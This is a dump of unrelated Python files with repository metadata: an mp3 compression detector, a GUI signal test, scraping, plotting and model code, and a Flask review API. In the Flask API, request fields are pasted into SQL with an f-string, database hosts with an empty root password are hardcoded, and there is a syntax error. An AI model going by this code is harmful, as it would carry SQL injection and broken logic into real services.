        _file_path = os.path.abspath(unicode(_folder_path) + u'/' + _file)
        _recv = os.popen(_decoder + u' \"' + _file_path + u'\" tmp.wav').read()
        # mpg123 prints "written" on a successful decode.
        if 'written' not in _recv:
            print 'Warning: This file (' + str(_file_path) + ') is not support'
        else:
            _recv = os.popen(_encoder + u' tmp.wav tmp.mp3 -b 32').read()
            analyse_process(1)
    print 'Analysing for origin ' + str(_bitrate) + '-bitrate mp3 file has been done'

# Pass 2: label double-compressed files as -1 (only the _64.mp3 variants).
for _bitrate in _bitrate_list:
    _folder_path = os.path.abspath(u'F:/mp3_sample/double_compression/' + _bitrate)
    _nxt_folder_list = os.listdir(_folder_path)
    print 'Starting analyse double-compress ' + str(_bitrate) + '-bitrate mp3 file'
    for _nxt_folder in _nxt_folder_list:
        _nxt_folder_path = os.path.abspath(unicode(_folder_path) + u'/' + _nxt_folder)
        _file_list = os.listdir(_nxt_folder_path)
        for _file in _file_list:
            # Skip the same-bitrate file; only _64.mp3 is actually kept
            # (the first check is redundant given the second when the
            # bitrate is not 64).
            if u'_' + _bitrate + u'.mp3' == _file: continue
            if _file != u'_64.mp3': continue
            _file_path = os.path.abspath(unicode(_nxt_folder_path) + u'/' + _file)
            _recv = os.popen(_decoder + u' \"' + _file_path + u'\" tmp.wav').read()
            if 'written' not in _recv:
                print 'Warning: This file (' + str(_file_path) + ') is not support'
            else:
                _recv = os.popen(_encoder + u' tmp.wav tmp.mp3 -b 64').read()
                analyse_process(-1)
    print 'Analysing for double-compress ' + str(_bitrate) + '-bitrate mp3 file has been done'

# Train the SVM on the collected samples and persist the model.
_m = svm_train(_y, _x)
svm_save_model('detecting_double_compression.model', _m)
|
[
"brickgao@gmail.com"
] |
brickgao@gmail.com
|
9b5d20d47711ba7a83d06dde399a527b07dff842
|
afa9fcd0f2443515ba89e96ed4eb9416e9d11847
|
/python/GafferUITest/WidgetSignalTest.py
|
16c810b148248bdab25d26e477a037f8edb2b1cb
|
[
"BSD-3-Clause"
] |
permissive
|
dneg/gaffer
|
6eb12b3ab3cde00afdf170c456969a38f5968237
|
e87cb50f55a048cd7f6d5dcdfe6f95e38db2c5b6
|
refs/heads/master
| 2021-01-16T18:13:33.456876
| 2013-09-24T17:23:58
| 2013-09-24T17:23:58
| 13,094,917
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,688
|
py
|
##########################################################################
#
# Copyright (c) 2011, John Haddon. All rights reserved.
# Copyright (c) 2012, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import weakref
import IECore
import Gaffer
import GafferUI
import GafferUITest
class WidgetSignalTest( GafferUITest.TestCase ) :
	"""Exercises GafferUI.WidgetSignal : slot calling, disconnection, and
	the interaction between connections and object lifetimes."""

	def test( self ) :

		w = GafferUI.TabbedContainer()
		s = GafferUI.WidgetSignal()
		# No slots connected yet, so the signal result defaults to False.
		self.assertEqual( s( w ), False )

		self.__widget = None
		def f( ww ) :
			self.__widget = ww
			return True

		c = s.connect( f )
		self.assertEqual( s( w ), True )
		# assertTrue() replaces the assert_() alias, which was deprecated in
		# Python 2.7 and removed in Python 3.12.
		self.assertTrue( self.__widget is w )

	def testDeletionOfConnectionDisconnects( self ) :

		w = GafferUI.TabbedContainer()
		s = GafferUI.WidgetSignal()
		self.assertEqual( s( w ), False )

		def f( ww ) :
			return True

		c = s.connect( f )
		self.assertEqual( s( w ), True )

		# Dropping the connection object must disconnect the slot.
		del c
		self.assertEqual( s( w ), False )

	def testCircularRef( self ) :

		class A( GafferUI.TabbedContainer ) :

			def __init__( self ) :
				GafferUI.TabbedContainer.__init__( self )
				self.signal = GafferUI.WidgetSignal()

			@staticmethod
			def f( widget ) :
				return True

			def ff( self, other ) :
				return True

		a = A()
		self.assertEqual( a.signal( a ), False )

		# A static method holds no reference back to the instance, so the
		# widget can still be collected.
		a.c = a.signal.connect( A.f )
		self.assertEqual( a.signal( a ), True )

		w = weakref.ref( a )
		self.assertTrue( w() is a )
		del a
		self.assertEqual( w(), None )

		a2 = A()
		self.assertEqual( a2.signal( a2 ), False )
		# it is imperative to connect to a WeakMethod to prevent
		# unbreakable circular references from forming.
		a2.c = a2.signal.connect( Gaffer.WeakMethod( a2.ff ) )
		self.assertEqual( a2.signal( a2 ), True )

		w = weakref.ref( a2 )
		self.assertTrue( w() is a2 )
		del a2
		self.assertEqual( w(), None )

	def tearDown( self ) :

		self.__widget = None
		GafferUITest.TestCase.tearDown( self )
if __name__ == "__main__":
	# Allow running this test module directly.
	unittest.main()
|
[
"thehaddonyoof@gmail.com"
] |
thehaddonyoof@gmail.com
|
29c05be213a365da1ca935d1295d2c2a2962abe5
|
f6c0eb27a3a8e93e8d0f38d105e584af826753c4
|
/00_3DVector_11.py
|
8b2a49a21382a0a9b25c40d144b8e6d5a1d7e417
|
[] |
no_license
|
UW-ParksidePhysics/Nicolas.Alexis
|
63e38096595a01780d1baf3b1c6ea94c70485c0f
|
64b34f02a96a72925168cf9d682b4ebe220520ae
|
refs/heads/master
| 2020-12-28T11:01:22.965307
| 2020-05-14T22:28:57
| 2020-05-14T22:28:57
| 238,303,308
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,274
|
py
|
from vpython import *
scene.background = color.white
scene.width = 600
scene.height = 600
scene.forward = vector(-.5, -.3, -1)
scene.caption = """To rotate "camera", drag with right button or Ctrl-drag.
To zoom, drag with middle button or Alt/Option depressed, or use scroll wheel.
On a two-button mouse, middle is left + right.
To pan left/right and up/down, Shift-drag.
Touch screen: pinch/extend to zoom, swipe or two-finger rotate."""
x_axis = cylinder(color=vector(1, 0, 0), pos=vector(0, 0, 0), axis=vector(10, 0, 0), radius=0.3)
x_lbl = label(pos=vector(11, 0, 0), text="x-axis", color=color.red, opacity=0, height=30, box=0)
y_axis = cylinder(color=color.green, pos=vector(0,0,0), axis=vector(0,10,0), radius=0.3)
y_lbl = label(pos=vector(0, 11, 0), text="y-axis", color=color.green, opacity=0, height=30, box=0)
z_axis = cylinder(color=color.blue, pos=vector(0, 0, 0), axis=vector(0, 0, 10), radius=0.3)
z_lbl = label(pos=vector(0, 0, 11), text="z-axis", color=color.blue, opacity=0, height=30, box=0)
birthday_axis = cylinder(color=color.yellow, pos=vector(0, 0, 0), axis=vector(4, 8, 11), radius=0.3)
birthday_lbl = label(pos=vector(5, 9, 12), text="birthday vector", color=color.yellow, opacity=0, height=30, box=0)
#day day month
|
[
"noreply@github.com"
] |
UW-ParksidePhysics.noreply@github.com
|
41b6c957f60424a66ad4720591bfc07fd731a89a
|
5864e86954a221d52d4fa83a607c71bacf201c5a
|
/carbon/common/script/net/GPSExceptions.py
|
f6085187795282172e0abadcda9083aae107424c
|
[] |
no_license
|
connoryang/1v1dec
|
e9a2303a01e5a26bf14159112b112be81a6560fd
|
404f2cebf13b311e754d45206008918881496370
|
refs/heads/master
| 2021-05-04T02:34:59.627529
| 2016-10-19T08:56:26
| 2016-10-19T08:56:26
| 71,334,417
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,541
|
py
|
#Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\carbon\common\script\net\GPSExceptions.py
import blue
import eve.common.script.net.eveMachoNetVersion as eveMachoVersion
import exceptions
class GPSException(StandardError):
__guid__ = 'exceptions.GPSException'
def __init__(self, *args):
super(GPSException, self).__init__(*args)
self.reason = args[0] if args else None
def __repr__(self):
return '<%s: reason=%r, args[1:]=%r>' % (self.__class__.__name__, self.reason, self.args[1:])
class GPSTransportClosed(GPSException):
__guid__ = 'exceptions.GPSTransportClosed'
def __init__(self, reason = None, reasonCode = None, reasonArgs = {}, machoVersion = None, version = None, build = None, codename = None, region = None, origin = None, loggedOnUserCount = None, exception = None):
args = (reason, exception) if exception else (reason,)
super(GPSTransportClosed, self).__init__(*args)
self.machoVersion = machoVersion or eveMachoVersion.machoVersion
self.version = version or boot.version
self.build = build or boot.build
self.codename = str(codename or boot.codename)
self.region = str(region or boot.region)
self.loggedOnUserCount = loggedOnUserCount or 'machoNet' in sm.services and sm.services['machoNet'].GetClusterSessionCounts('EVE:Online')[0]
self.origin = origin or boot.role
self.clock = blue.os.GetWallclockTimeNow()
self.reasonCode = reasonCode
self.reasonArgs = reasonArgs
def GetCloseArgs(self):
args = {'reason': getattr(self, 'reason', None),
'reasonCode': getattr(self, 'reasonCode', None),
'reasonArgs': getattr(self, 'reasonArgs', None),
'exception': self}
return args
class GPSRemoteTransportClosed(GPSTransportClosed):
__guid__ = 'exceptions.GPSRemoteTransportClosed'
class GPSBadAddress(GPSException):
__guid__ = 'exceptions.GPSBadAddress'
class GPSAddressOccupied(GPSException):
__guid__ = 'exceptions.GPSAddressOccupied'
import __builtin__
__builtin__.GPSException = GPSException
__builtin__.GPSTransportClosed = GPSTransportClosed
__builtin__.GPSBadAddress = GPSBadAddress
__builtin__.GPSAddressOccupied = GPSAddressOccupied
exceptions.GPSException = GPSException
exceptions.GPSRemoteTransportClosed = GPSRemoteTransportClosed
exceptions.GPSTransportClosed = GPSTransportClosed
exceptions.GPSBadAddress = GPSBadAddress
exceptions.GPSAddressOccupied = GPSAddressOccupied
|
[
"le02005@163.com"
] |
le02005@163.com
|
c58d67fbc013e1dd1dc6694f56b280bb6ce809ec
|
6713372c2c86e766a80f440b441673ba232bc649
|
/jcsalesweb/jcsalesweb/spiders/built.py
|
494ba102178465301903840a9977e75fb7212b39
|
[] |
no_license
|
rahul-keshav/zech-all-python-scrapers
|
3e0c98d69a036468dd49e1763de0c2f54486cc83
|
1576738c4f34d08c29d97145f43c343da8400d70
|
refs/heads/main
| 2023-03-03T15:19:10.523293
| 2021-02-17T16:55:05
| 2021-02-17T16:55:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,785
|
py
|
import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
class BuiltSpider(CrawlSpider):
name = 'built'
allowed_domains = ['www.jcsalesweb.com']
start_urls = ['https://www.jcsalesweb.com/']
rules = (
Rule(LinkExtractor(restrict_xpaths='//li[@class="nav-category-item"]/a'), follow=True),
Rule(LinkExtractor(restrict_xpaths='//div[@class="display-label product-name"]/a'), callback = 'parse_item', follow=True),
Rule(LinkExtractor(restrict_xpaths='(//a[@class="page-nav-label"])[2]'), follow=True),
)
def parse_item(self, response):
title = response.xpath('//h2/text()').get()
item_no = response.xpath('normalize-space(//div[@style="margin-top: 4px; font-size: 17px; font-weight: bold; color: #103972;"]/text())').get()
country_of_origin = response.xpath('normalize-space(//div[contains(text(),"Country of Origin")]/text())').get()
barcode = response.xpath('normalize-space(//div[contains(text(),"Barcode")]/text()[2])').get()
desc = response.xpath('normalize-space(//div[@class="product-umdescription"]/text())').get()
image = response.xpath('//div[@class="image"]/a[@class="dispaly-large-image"]/@href').get()
price = response.xpath('normalize-space(//span[@class="display-label each-price"]/text())').get()
pack_price = response.xpath('normalize-space(//span[@class="pack-price"]/text())').get()
yield{
'title':title,
'item_no':item_no,
"Country of Origin":country_of_origin,
'barcode':barcode,
'Description':desc,
'image':image,
'price':price,
'pack_price':pack_price,
'url':response.url
}
|
[
"rr916122@gmail.com"
] |
rr916122@gmail.com
|
26f64a83d5cd89221d7f1665dc549ffb54fdaa11
|
9b722ca41671eb2cea19bac5126d0920639261bd
|
/.history/app_20201124130253.py
|
b87b9dad2453eba605fff3c3a7ef82b879f9ac2b
|
[] |
no_license
|
thawalk/db_flask_server
|
7928fd481f99d30bdccc60d97f02db78324cfdbe
|
cd55f1c9bf84c734457ee02d9f64a6833e295fad
|
refs/heads/master
| 2023-01-25T02:40:19.097457
| 2020-12-06T07:45:50
| 2020-12-06T07:45:50
| 314,229,480
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,691
|
py
|
import json
import pymongo
from flask import Flask, jsonify, url_for, request, redirect,Response,Request
import pymongo
from bson.json_util import dumps
import mysql.connector
from werkzeug.serving import run_simple
import os
from dotenv import load_dotenv
import datetime
import time
app = Flask(__name__)
test_collection='test_collection'
mongo = pymongo.MongoClient('mongodb://54.83.130.150:27017/?readPreference=primary&appname=MongoDB%20Compass&ssl=false')
db = pymongo.database.Database(mongo, 'test')
metadata_col = pymongo.collection.Collection(db, 'test_collection')
db = mysql.connector.connect(
host ='3.84.158.241',
user = 'root',
password = '',
database = 'reviews',
)
cur = db.cursor()
@app.route('/',methods=["GET"])
def api_root():
data = {
'message': 'Welcome to our website. Where reviews are our number one priority'
}
js = json.dumps(data)
response = Response(js, status=200, mimetype='application/json')
return response
@app.route('/categories', methods = ['GET']) #TODO: #returns list of categories
def get_categories():
categories = []
js = json.dumps(data)
response = Response(js, status=200, mimetype='application/json')
return response
@app.route('/search', methods=['GET']) #now it only searches for TITLE. the mongo metadata does not have author
def search_book():
try:
data = request.json
title = data["title"]
result = metadata_col.find({"title":title})
result_array = dumps(list(result))
print(result_array)
js = json.dumps(result_array)
response = Response(js, status=200, mimetype='application/json')
return response
except:
errMsg = "Please include title."
js = json.dumps(errMsg)
response = Response(js, status=400, mimetype='application/json')
return response
# @app.route('/review', methods=['POST'])
# def add_review():
# if not request.json or not request.json['asin'] or type(request.json['asin']) != str or not request.json['overall'] or not request.json['reviewText'] or type(request.json['reviewText']) != str or not request.json['reviewTime'] or type(request.json['reviewTime']) != str or not request.json['reviewerID'] or type(request.json['reviewerID']) != str or not request.json['reviewerName'] or type(request.json['reviewerName']) != str or not request.json['summary'] or type(request.json['summary']) != str or not request.json['unixReviewTime'] or type(request.json['unixReviewTime']) != int :
# return 'invalid request msg', 404
# txt = "INSERT INTO 'kindle_reviews' ('id', 'asin', 'overall', 'reviewText', 'reviewTime', 'reviewerID', 'reviewerName', 'summary', 'unixReviewTime') VALUES (%s)"
# values = (None, request.json['asin'], request.json['overall'], request.json['reviewText'], request.json['reviewTime'], request.json['reviewerID'], request.json['reviewerName'], request.json['summary'], request.json['unixReviewTime'])
# cur.execute(txt, values)
# return 'successfully uploaded new review', 200
@app.route('/addBook',methods= ['POST'])
def add_book():
# if not request.json or not request.json['asin'] or type(request.json['asin']) != str or not request.json['overall'] or not request.json['reviewText'] or type(request.json['reviewText']) != str or not request.json['reviewTime'] or type(request.json['reviewTime']) != str or not request.json['reviewerID'] or type(request.json['reviewerID']) != str or not request.json['reviewerName'] or type(request.json['reviewerName']) != str or not request.json['summary'] or type(request.json['summary']) != str or not request.json['unixReviewTime'] or type(request.json['unixReviewTime']) != int :
# return 'invalid request msg', 404
try:
data = request.json
title = data['title']
asin = data['asin']
description = data['description']
price = data['price']
categories = data['categories']
message = "Book added successfully"
metadata_col.insert({"title":title,"asin":asin,"description":description,"price":price,"categories":categories})
js = json.dumps(message)
response = Response(js, status=201, mimetype='application/json')
return response
except:
errMsg = "Please include title, asin, description, price and categories."
js = json.dumps(errMsg)
response = Response(js, status=400, mimetype='application/json')
return response
@app.route('/addReview',methods = ['POST']) #TODO: add review INTO sql part
def add_review():
try:
data = request.json
asin = data["asin"]
helpful = [0,0]
overall = data["overall"]
reviewText = data["reviewText"]
reviewTime = data["reviewTime"]
reviewerID = data["reviewerID"]
reviewerName = data["reviewerName"]
summary = data["summary"]
unixReviewTime = int(time.time())
mySQL_insert_query = f"""INSERT INTO reviews.kindle_reviews (asin, helpful, overall, reviewText, reviewTime, reviewerID, reviewerName, summary, unixReviewTime)
VALUES ("{asin}","{helpful}",{overall},"{reviewText}","{reviewTime}","{reviewerID}","{reviewerName}","{summary}","{unixReviewTime}");"""
cur.execute(mySQL_insert_query)
db.commit()
message = "Successfully uploaded review"
js = json.dumps(message)
response = Response(js, status=201, mimetype='application/json')
return response
except:
errMsg = "An error occurred. Please check if you have all fields."
js = json.dumps(errMsg)
response = Response(js, status=400, mimetype='application/json')
return response
@app.route('/sortByGenres', methods= ['GET']) #TODO: sort by genres from mongo metadata categories
def sort_by_genres():
pass
@app.route('/sortByRating' , methods = ['GET'])
def sort_by_ratings(): #sort by increasing ratings, decreasing rating
try:
data = request.json
rating_preference = data['rating_preference']
if(rating_preference = 'increasing'): #means rating 1 will come out first
mySQL_sort_query = """SELECT * FROM reviews.kindle_reviews ORDER BY overall ASC LIMIT 10;"""
cur.execute(mySQL_sort_query)
result_set = cursor.fetchall()
except:
errMsg = "An error occurred. Please check if you have all fields."
js = json.dumps(errMsg)
response = Response(js, status=400, mimetype='application/json')
return response
if __name__ == '__main__':
# app.run(host="0.0.0.0", port=80) #remember to change this part
app.run(debug=True)
|
[
"akmal_hakim_teo@hotmail.com"
] |
akmal_hakim_teo@hotmail.com
|
1abec2b264b95150cd3bd58187b7e71b6269d40a
|
8616892b6541602b53fdd94d1552d8e96b7ab722
|
/dessn/investigations/zeropoints/__init__.py
|
431f70a613cbef2e8ba27f431334a7a83058d136
|
[
"MIT"
] |
permissive
|
dessn/sn-bhm
|
7c436877832ec10e4af318a6befff9fb8ffcbf3a
|
f320a41f9a4f2be49073437e98addca79e938160
|
refs/heads/master
| 2020-08-28T03:34:38.180148
| 2019-05-01T04:23:23
| 2019-05-01T04:23:23
| 45,723,864
| 1
| 0
| null | 2017-04-25T02:54:43
| 2015-11-07T05:27:44
|
Python
|
UTF-8
|
Python
| false
| false
| 2,272
|
py
|
r"""
A fully rigorous analysis would be expected to integrate zero point
uncertainty and covariance by having the conversion between counts
and flux. However, this is numerically infeasible, as there are so
many observational effects that must be included to get the actual
flux and flux error. Because of this, zero point uncertainty is
generally propagated into analysis by determining the numerical
derivative of the parameters of interest (generally apparent magnitude,
stretch and colour of the supernovae) with respect to the zero points
by simulations. In doing this, there is an assumption made about the
linearity of the gradient surface.
For our DES-like data sample, we find that numerical derivatives
remain linear on scales exceeding :math:`5\sigma`, and so utilise this method
like previous analyses.
As normal, we take a base light curve, and then - for each band we have -
we shift the flux and flux error for those observations lke we had perturbed
the zero point, and compare the difference in SALT2 fit summary statistics
between the base light curve and the perturbed light curve.
With typical zero point uncertainty estimated to be of the order of :math:`0.01` mag,
we calculate numerical derivatives using that :math:`\delta Z_b = 0.01`. Identical results were
used found when using :math:`\delta Z_b = 0.05` and when using either Newton's
difference quotient or symmetric difference quotient.
Using several thousand supernova and simulating an underlying population
which has dispersion in magnitude, stretch and colour, we produce the following
plot.
.. figure:: ../dessn/investigations/zeropoints/output/sensitivity.png
:align: center
:width: 60%
The lighter and more disperse colours show the numerical gradients I
have calculated. The darker, tighter and discontinuous lines are
gradients Chris Lidman has calculated (using canonical supernova). Whilst
he is using DES observations and I assume fixed cadence, the disparity
between the curves is a concern and needs to be figured out. I should note
that the underlying population I draw from is not the issue here - I still have
many times his dispersion when I collapse my underlying supernova population
into a delta function.
"""
|
[
"samuelreay@gmail.com"
] |
samuelreay@gmail.com
|
6e15047fc8b42f8993d0c2fa8ea6535776a3d0a1
|
ded0c895f6e1f8853f2222ae498bdc7ae52ef0e4
|
/week-03/week03/fit_es9_bodediag_g500.py
|
52b0261c3feb10d4a04ae9a37b493ba89d270a4d
|
[] |
no_license
|
LorenzoLMP/TD2015
|
6a8846b4592b32db81338b8522a10a2dc52531c1
|
e39b51d48149d07c3cea682a02eeec4e69ffbabd
|
refs/heads/master
| 2021-01-17T14:47:20.378339
| 2016-05-31T11:33:50
| 2016-05-31T11:33:50
| 43,302,288
| 0
| 0
| null | 2015-09-28T13:58:46
| 2015-09-28T13:23:45
| null |
UTF-8
|
Python
| false
| false
| 2,208
|
py
|
from pylab import *
from scipy import *
from scipy import optimize
from scipy import misc
data = genfromtxt('es9_500_buono')
f = data[:,0]
guad = data[:,1]
sfasa = data[:,2]
xdata = f
ydata = guad
zdata = sfasa
#sigmax = data [:,3]
#sigmay = data [:,4]
for k in range (len(zdata)):
zdata[k]=zdata[k] - 0.0006*xdata[k]
#########################################
sigmay = []
i = 0
while i < len(ydata):
t = max(0.03/100, 2*sqrt(2)*0.002)
w = sqrt( t**2 + 0.005/(ydata[i]*0.1) )
sigmay.append(w)
i = i+1
sigmay = array(sigmay)
sigmax = []
i = 0
while i < len(xdata):
s = max(0.040, xdata[i]*5*10**(-5))
sigmax.append(s)
i = i +1
sigmax = array(sigmax)
##############################################
rc('font', size=15)
#xlabel(r'$frequenza [Hz]$')
#ylabel(r'$Gain $')
minorticks_on()
#Attivare per scala bilog
#xscale('log')
#yscale('log')
#xlim(80,30000)
#ylim(35,103)
############################################################
#Parte per plot dati
#grid('on', which = "both")
#title("Bode Diagram Gain-Phase", size = 15)
#plot(xdata, ydata, linestyle="None",marker=".", color="black", markersize= 10)
subplot(2, 1, 1)
title("Bode Diagram Gain-Phase G500", size = 15)
errorbar(xdata, ydata, sigmay, sigmax, linestyle="None", color="black")
xscale('log')
xlim(100,10000)
#xlabel(r'$frequenza [Hz]$')
ylabel(r'$Gain $')
grid('on', which = "both")
freq_tagl = r'$f_{C} = 1.64 \pm 0.04 kHz $'
text(xdata.min()*1.5, 300, freq_tagl, family='serif', style='italic', size=15)
gain = r'$G = 540 \pm 2 $'
text(xdata.min()*1.5, 200, gain, family='serif', style='italic', size=15)
prod = r'$G*f_{C} = (887 \pm 30) kHz $'
text(xdata.min()*1.5, 100, prod, family='serif', style='italic', size=15)
#savefig('C:\Python33\Fuso\filtro_RC\grafico1.png', dpi=200)
################################################################
subplot(2,1,2)
plot(xdata, zdata, linestyle="None",marker=".", color="black", markersize= 6)
#errorbar(xdata, zdata, linestyle="None", color="black")
xscale('log')
xlabel(r'$frequenza [Hz]$')
#xlim(80,30000)
ylabel(r'$Sfasamento $')
grid('on', which = "both")
savefig('es_9_bode_g500.png', dpi=400)
show()
|
[
"lorenzo.perrone.lmp@gmail.com"
] |
lorenzo.perrone.lmp@gmail.com
|
3e5cd7fd66923a6dfbc3094447a16059ab09184f
|
0adf94fc39a02018165b62e93dd83edddd041230
|
/.history/Jobs/models_20190223175917.py
|
16e73071aaf08e851f1634fc3c30a492187135df
|
[] |
no_license
|
SabitDeepto/BrJobs
|
1e3baa143331cf46b9c70911c6644d1efd4fffd6
|
1a458c8c667f8093a2325d963e5542655467c7aa
|
refs/heads/master
| 2020-04-24T08:02:26.350007
| 2019-03-17T05:53:30
| 2019-03-17T05:53:30
| 171,818,024
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,436
|
py
|
from django.db import models
from django.utils.text import slugify
# Create your models here.
class JobPost(models.Model):
title_1 = models.CharField(max_length=100, null=True, blank=True)
subtitle_1 = models.CharField(max_length=150, null=True, blank=True)
title_2 = models.CharField(max_length=100, null=True, blank=True)
subtitle_2 = models.CharField(max_length=150, null=True, blank=True)
slug = models.SlugField(null=True, blank=True, help_text="Slug will be generated automatically from the title_2 of the post")
button = models.CharField(max_length=30, null=True, blank=True)
heading_1 = models.CharField(max_length=100, null=True, blank=True)
heading_2 = models.CharField(max_length=100, null=True, blank=True)
description = models.TextField(null=True, blank=True)
l_image = models.ImageField(upload_to="solution", help_text="top left image", null=True, blank=True)
r_image = models.ImageField(upload_to="solution", help_text="top right image", null=True, blank=True)
m_image = models.ImageField(upload_to="solution", help_text="your main image", null=True, blank=True)
last_3_digit = models.IntegerField(null=True)
transaction_id = models.IntegerField(null=True)
date = models.DateTimeField(auto_now_add=True)
gender_choice = (
('done', 'DONE'),
('pending', 'PENDING'),
)
status = models.CharField(choices=gender_choice, max_length=200)
|
[
"deepto69@gmail.com"
] |
deepto69@gmail.com
|
8534ba19ac8b1dbb98e26204edaffc27a8b3f144
|
ea008627679802814b0ff8bcd91449af63348337
|
/lib/exabgp/bgp/message/open/routerid.py
|
f2db32231b684f6f493245fa86788d9d65c8ecd6
|
[
"BSD-3-Clause"
] |
permissive
|
vbancroft/exabgp
|
aaab88ce5f1d0be94caa9381100cfba9e48043c2
|
4e6b88248e536b83b88e1d5df395048adc292fc0
|
refs/heads/master
| 2021-01-16T00:10:26.083063
| 2014-01-22T15:18:16
| 2014-01-22T15:18:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
py
|
# encoding: utf-8
"""
routerid.py
Created by Thomas Mangin on 2012-07-17.
Copyright (c) 2009-2013 Exa Networks. All rights reserved.
"""
from exabgp.protocol.ip.inet import Inet,inet
# =================================================================== RouterID
class RouterID (Inet):
def __init__ (self,ipv4):
Inet.__init__(self,*inet(ipv4))
|
[
"thomas.mangin@exa-networks.co.uk"
] |
thomas.mangin@exa-networks.co.uk
|
39fc66bf10c68f9c87ae44bb546889ae81b955fc
|
cbfb679bd068a1153ed855f0db1a8b9e0d4bfd98
|
/learning_material/nonlocal_vs_global.py
|
e6d9bb0ab5431b381a63b5c864ee458c3e4b0629
|
[] |
no_license
|
arsamigullin/problem_solving_python
|
47715858a394ba9298e04c11f2fe7f5ec0ee443a
|
59f70dc4466e15df591ba285317e4a1fe808ed60
|
refs/heads/master
| 2023-03-04T01:13:51.280001
| 2023-02-27T18:20:56
| 2023-02-27T18:20:56
| 212,953,851
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 539
|
py
|
class NonLocalVsGlobal:
def testNonLocal(self):
# this works
res = []
var = 0
for i in range(5):
var+=1
res.append(var)
print(var,res)
def helper():
#nonlocal var, res # without nonlocal this code throws an error
if var == 10:
return
print(var)
#res+=[108]
res.append(var)
helper()
print(var,res)
if __name__ == "__main__":
s=NonLocalVsGlobal()
s.testNonLocal()
|
[
"ar.smglln@gmail.com"
] |
ar.smglln@gmail.com
|
a5eea522f46af7faf91c63b7568dc49fe71b3aad
|
e2cc296dc3627242e56cd6f0a08f1e0dd8214eb2
|
/src/app/routers/geo.py
|
e6289796b70b78b03c05ec6185238c703f8fbf6a
|
[
"MIT"
] |
permissive
|
trivedisorabh/fastapi-tile38
|
b7604d0f90261b30fa1559de50742d2ab0192dd0
|
878e74211cfa3fc0a0e55c68aeaae5b2822a9a4d
|
refs/heads/main
| 2023-07-16T06:26:59.794998
| 2021-09-03T11:09:49
| 2021-09-05T13:30:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,518
|
py
|
from typing import Optional
from fastapi import APIRouter, status
from pyle38.responses import ObjectsResponse
from app.db.db import tile38
from app.models.vehicle import VehiclesResponse, Vehicle
router = APIRouter()
@router.get(
"/search/within",
response_model=VehiclesResponse,
response_model_exclude_none=True,
tags=["geo-search"],
status_code=status.HTTP_200_OK,
)
async def get_within(lat: float, lon: float, radius: float) -> VehiclesResponse:
vehicles: ObjectsResponse[Vehicle] = (
await tile38.within("fleet").circle(lat, lon, radius).asObjects()
)
response = {"data": vehicles.objects}
return VehiclesResponse(**response)
@router.get(
"/search/nearby",
response_model=VehiclesResponse,
response_model_exclude_none=True,
tags=["geo-search"],
status_code=status.HTTP_200_OK,
)
async def get_nearby(
lat: float, lon: float, radius: Optional[int] = None
) -> VehiclesResponse:
if radius:
vehicles_in_radius: ObjectsResponse[Vehicle] = (
await tile38.nearby("fleet")
.point(lat, lon, radius)
.distance()
.nofields()
.asObjects()
)
response = {"data": vehicles_in_radius.objects}
return VehiclesResponse(**(response))
vehicles: ObjectsResponse[Vehicle] = (
await tile38.nearby("fleet").point(lat, lon).distance().nofields().asObjects()
)
response = {"data": vehicles.objects}
return VehiclesResponse(**(response))
|
[
"legionaerr@googlemail.com"
] |
legionaerr@googlemail.com
|
11e1f3fefec856c167d3df43e987a3f0636810ca
|
7275f7454ce7c3ce519aba81b3c99994d81a56d3
|
/sp1/python全栈/面向对象编程/面向对象进阶_用的较少/item_setitem_getitem_delitem.py
|
f0f215284ad925f208c9887c93688877a6c8cf0b
|
[] |
no_license
|
chengqiangaoci/back
|
b4c964b17fb4b9e97ab7bf0e607bdc13e2724f06
|
a26da4e4f088afb57c4122eedb0cd42bb3052b16
|
refs/heads/master
| 2020-03-22T08:36:48.360430
| 2018-08-10T03:53:55
| 2018-08-10T03:53:55
| 139,777,994
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 501
|
py
|
#.系列跟attr相关,字典的形式跟item相关
class Foo():
def __getitem__(self,item):
print("getitem",item)
return self.__dict__[item]
def __setitem__(self,key,value):
print("setitem")
self.__dict__[key] = value
def __delitem__(self,key):
print("delitem")
self.__dict__.pop(key)
f1 = Foo()
